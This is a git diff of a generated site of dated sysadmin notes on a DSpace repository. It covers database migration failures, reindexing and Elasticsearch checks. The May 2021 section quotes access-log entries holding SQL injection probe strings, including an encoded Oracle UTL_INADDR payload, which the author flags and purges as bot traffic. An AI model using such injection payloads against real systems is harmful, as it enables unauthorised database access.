                                                                                                                                                                                                                                                                                                                                            -Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                            -Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                            -Migration exception:
                                                                                                                                                                                                                                                                                                                                            -java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                            -Caused by: org.flywaydb.core.api.FlywayException: Validate failed: 
                                                                                                                                                                                                                                                                                                                                            -Detected applied migration not resolved locally: 5.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                            -Detected applied migration not resolved locally: 6.0.2017.01.30
                                                                                                                                                                                                                                                                                                                                            -Detected applied migration not resolved locally: 6.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.doValidate(Flyway.java:292)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.access$100(Flyway.java:73)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway$1.execute(Flyway.java:166)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway$1.execute(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.execute(Flyway.java:527)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.migrate(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:729)
                                                                                                                                                                                                                                                                                                                                            -        ... 9 more
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              $ ~/dspace7b5/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              +Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                              +Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                              +Migration exception:
                                                                                                                                                                                                                                                                                                                                              +java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                              +Caused by: org.flywaydb.core.api.FlywayException: Validate failed: 
                                                                                                                                                                                                                                                                                                                                              +Detected applied migration not resolved locally: 5.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                              +Detected applied migration not resolved locally: 6.0.2017.01.30
                                                                                                                                                                                                                                                                                                                                              +Detected applied migration not resolved locally: 6.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.doValidate(Flyway.java:292)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.access$100(Flyway.java:73)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway$1.execute(Flyway.java:166)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway$1.execute(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.execute(Flyway.java:527)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.migrate(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:729)
                                                                                                                                                                                                                                                                                                                                              +        ... 9 more
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              • I deleted those migrations:
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              localhost/dspace7b5= > DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                localhost/dspace7b5= > DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                • Then when I ran the migration again it failed for a new reason, related to the configurable workflow:
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                                -Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                                -Migration exception:
                                                                                                                                                                                                                                                                                                                                                -java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                                -Caused by: org.flywaydb.core.internal.command.DbMigrate$FlywayMigrateException:
                                                                                                                                                                                                                                                                                                                                                -Migration V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql failed
                                                                                                                                                                                                                                                                                                                                                ---------------------------------------------------------------------
                                                                                                                                                                                                                                                                                                                                                -SQL State  : 42P01
                                                                                                                                                                                                                                                                                                                                                -Error Code : 0
                                                                                                                                                                                                                                                                                                                                                -Message    : ERROR: relation "cwf_pooltask" does not exist
                                                                                                                                                                                                                                                                                                                                                -  Position: 8
                                                                                                                                                                                                                                                                                                                                                -Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql (/home/aorth/src/apache-tomcat-9.0.45/file:/home/aorth/dspace7b5/lib/dspace-api-7.0-beta5.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql)
                                                                                                                                                                                                                                                                                                                                                -Line       : 16
                                                                                                                                                                                                                                                                                                                                                -Statement  : UPDATE cwf_pooltask SET workflow_id='defaultWorkflow' WHERE workflow_id='default'
                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                                  +Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                                  +Migration exception:
                                                                                                                                                                                                                                                                                                                                                  +java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                                  +Caused by: org.flywaydb.core.internal.command.DbMigrate$FlywayMigrateException:
                                                                                                                                                                                                                                                                                                                                                  +Migration V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql failed
                                                                                                                                                                                                                                                                                                                                                  +--------------------------------------------------------------------
                                                                                                                                                                                                                                                                                                                                                  +SQL State  : 42P01
                                                                                                                                                                                                                                                                                                                                                  +Error Code : 0
                                                                                                                                                                                                                                                                                                                                                  +Message    : ERROR: relation "cwf_pooltask" does not exist
                                                                                                                                                                                                                                                                                                                                                  +  Position: 8
                                                                                                                                                                                                                                                                                                                                                  +Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql (/home/aorth/src/apache-tomcat-9.0.45/file:/home/aorth/dspace7b5/lib/dspace-api-7.0-beta5.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql)
                                                                                                                                                                                                                                                                                                                                                  +Line       : 16
                                                                                                                                                                                                                                                                                                                                                  +Statement  : UPDATE cwf_pooltask SET workflow_id='defaultWorkflow' WHERE workflow_id='default'
                                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                  $ ~/dspace7b5/bin/dspace database migrate ignored
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    $ ~/dspace7b5/bin/dspace database migrate ignored
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    • Now I see all migrations have completed and DSpace actually starts up fine!
                                                                                                                                                                                                                                                                                                                                                    • I will try to do a full re-index to see how long it takes:
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                    $ time ~/dspace7b5/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                                    -~/dspace7b5/bin/dspace index-discovery -b  25156.71s user 64.22s system 97% cpu 7:11:09.94 total
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      $ time ~/dspace7b5/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                                                                                                                                      +~/dspace7b5/bin/dspace index-discovery -b  25156.71s user 64.22s system 97% cpu 7:11:09.94 total
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      • Not good, that shit took almost seven hours!

                                                                                                                                                                                                                                                                                                                                                      2021-04-27

                                                                                                                                                                                                                                                                                                                                                      @@ -1012,9 +1012,9 @@ Statement : UPDATE cwf_pooltask SET workflow_id='defaultWorkflow' WHERE
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                  $ csvgrep -e 'windows-1252' -c 'Handle.net IDs' -i -m '10568/' ~/Downloads/Altmetric\ -\ Research\ Outputs\ -\ CGSpace\ -\ 2021-04-26.csv | csvcut -c DOI | sed '1d' > /tmp/dois.txt
                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.csv -db dspace63 -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    $ csvgrep -e 'windows-1252' -c 'Handle.net IDs' -i -m '10568/' ~/Downloads/Altmetric\ -\ Research\ Outputs\ -\ CGSpace\ -\ 2021-04-26.csv | csvcut -c DOI | sed '1d' > /tmp/dois.txt
                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.csv -db dspace63 -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    • He will Tweet them…
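The `csvgrep` pipeline above keeps the rows whose `Handle.net IDs` column does not contain `10568/` (the `-i` flag inverts the `-m` match), cuts out the `DOI` column, and drops the header line. A rough Python equivalent of that filtering step might look like the sketch below. The function name `extract_dois` is hypothetical, and the choice to skip rows with an empty DOI is an assumption of this sketch rather than something the shell pipeline does.

```python
import csv


def extract_dois(csv_path, handle_column="Handle.net IDs", doi_column="DOI",
                 handle_prefix="10568/", encoding="windows-1252"):
    """Return DOIs from rows whose handle column does NOT contain handle_prefix.

    Mirrors `csvgrep -c ... -i -m '10568/' | csvcut -c DOI | sed '1d'`,
    except that rows with an empty DOI are skipped (an assumption of this sketch).
    """
    dois = []
    with open(csv_path, newline="", encoding=encoding) as csv_file:
        for row in csv.DictReader(csv_file):
            handles = row.get(handle_column) or ""
            if handle_prefix in handles:
                # The row already references a handle with this prefix, so skip it
                continue
            doi = (row.get(doi_column) or "").strip()
            if doi:
                dois.append(doi)
    return dois
```

The returned list could then be written one DOI per line to a file such as `/tmp/dois.txt`.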

                                                                                                                                                                                                                                                                                                                                                    2021-04-28

diff --git a/docs/2021-05/index.html b/docs/2021-05/index.html
index c285cb5a6..29b2abd88 100644
--- a/docs/2021-05/index.html
+++ b/docs/2021-05/index.html
@@ -36,7 +36,7 @@ I looked at the top user agents and IPs in the Solr statistics for last month an
 I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one… as that’s an actual user… "/>
-
+
@@ -147,17 +147,17 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata-21%2B21*01 HTTP/1.1" 200 458201 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'||lower('')||' HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'%2Brtrim('')%2B' HTTP/1.1" 200 458209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata-21%2B21*01 HTTP/1.1" 200 458201 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'||lower('')||' HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'%2Brtrim('')%2B' HTTP/1.1" 200 458209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  • I will report the IP on abuseipdb.com and purge their hits from Solr
                                                                                                                                                                                                                                                                                                                                                  • The second IP is in Colombia and is making thousands of requests for what looks like some test site:
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                  181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                  -181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                    +181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    • But this site does not exist (yet?)
                                                                                                                                                                                                                                                                                                                                                      • I will purge them from Solr
                                                                                                                                                                                                                                                                                                                                                      • @@ -165,46 +165,46 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
                                                                                                                                                                                                                                                                                                                                                      • The third IP is in Russia apparently, and the user agent has the pl-PL locale with thousands of requests like this:
                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                      45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] "GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&isAllowed=y HTTP/1.1" 200 918998 "http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15"
                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] "GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&isAllowed=y HTTP/1.1" 200 918998 "http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15"
                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        • I will purge these all with my check-spider-ip-hits.sh script:
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                        -Purging 21648 hits from 193.169.254.178 in statistics
                                                                                                                                                                                                                                                                                                                                                        -Purging 20323 hits from 181.62.166.177 in statistics
                                                                                                                                                                                                                                                                                                                                                        -Purging 19376 hits from 45.146.166.180 in statistics
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 61347
                                                                                                                                                                                                                                                                                                                                                        -

                                                                                                                                                                                                                                                                                                                                                        2021-05-02

                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                        +Purging 21648 hits from 193.169.254.178 in statistics
                                                                                                                                                                                                                                                                                                                                                        +Purging 20323 hits from 181.62.166.177 in statistics
                                                                                                                                                                                                                                                                                                                                                        +Purging 19376 hits from 45.146.166.180 in statistics
                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 61347
                                                                                                                                                                                                                                                                                                                                                        +
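The request from the third IP above is easier to read once its query string is percent-decoded. The following is a minimal Python sketch, not part of the original workflow: the `SQL_MARKERS` list and both function names are hypothetical, chosen only for illustration. After decoding, the payload calls `UTL_INADDR.GET_HOST_ADDRESS` and selects `FROM DUAL`, both Oracle names, so it looks like a SQL injection probe rather than a normal download.

```python
from urllib.parse import unquote, urlsplit

# Request target copied from the access log entry for 45.146.166.180 above.
REQUEST_TARGET = (
    "/bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf"
    "?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28"
    "CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29"
    "%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691"
    "%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113"
    "%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR"
    "%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&isAllowed=y"
)

# Hypothetical, deliberately small list of substrings that should not
# appear in a legitimate bitstream request. This is an assumption for the
# sketch, not a complete injection detector.
SQL_MARKERS = ("UTL_INADDR", "SELECT ", " FROM DUAL", "CHR(")


def decode_query(target: str) -> str:
    """Return the percent-decoded query string of a request target."""
    return unquote(urlsplit(target).query)


def looks_like_sqli(target: str) -> bool:
    """Return True if the decoded query contains any of the markers."""
    decoded = decode_query(target).upper()
    return any(marker in decoded for marker in SQL_MARKERS)


if __name__ == "__main__":
    print(decode_query(REQUEST_TARGET))
    print(looks_like_sqli(REQUEST_TARGET))
```

A check like this only helps with spotting suspicious entries while reading the logs; the purge itself was done per IP with `check-spider-ip-hits.sh` as shown above.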

                                                                                                                                                                                                                                                                                                                                                        2021-05-02

                                                                                                                                                                                                                                                                                                                                                        • Check the AReS Harvester indexes:
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                                        -$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                        -...
                                                                                                                                                                                                                                                                                                                                                        -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                        -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                        -    },
                                                                                                                                                                                                                                                                                                                                                        -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                        -        "aliases": {
                                                                                                                                                                                                                                                                                                                                                        -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                        -        }
                                                                                                                                                                                                                                                                                                                                                        -    },
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                                          +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                          +...
                                                                                                                                                                                                                                                                                                                                                          +    "openrxv-items-temp": {
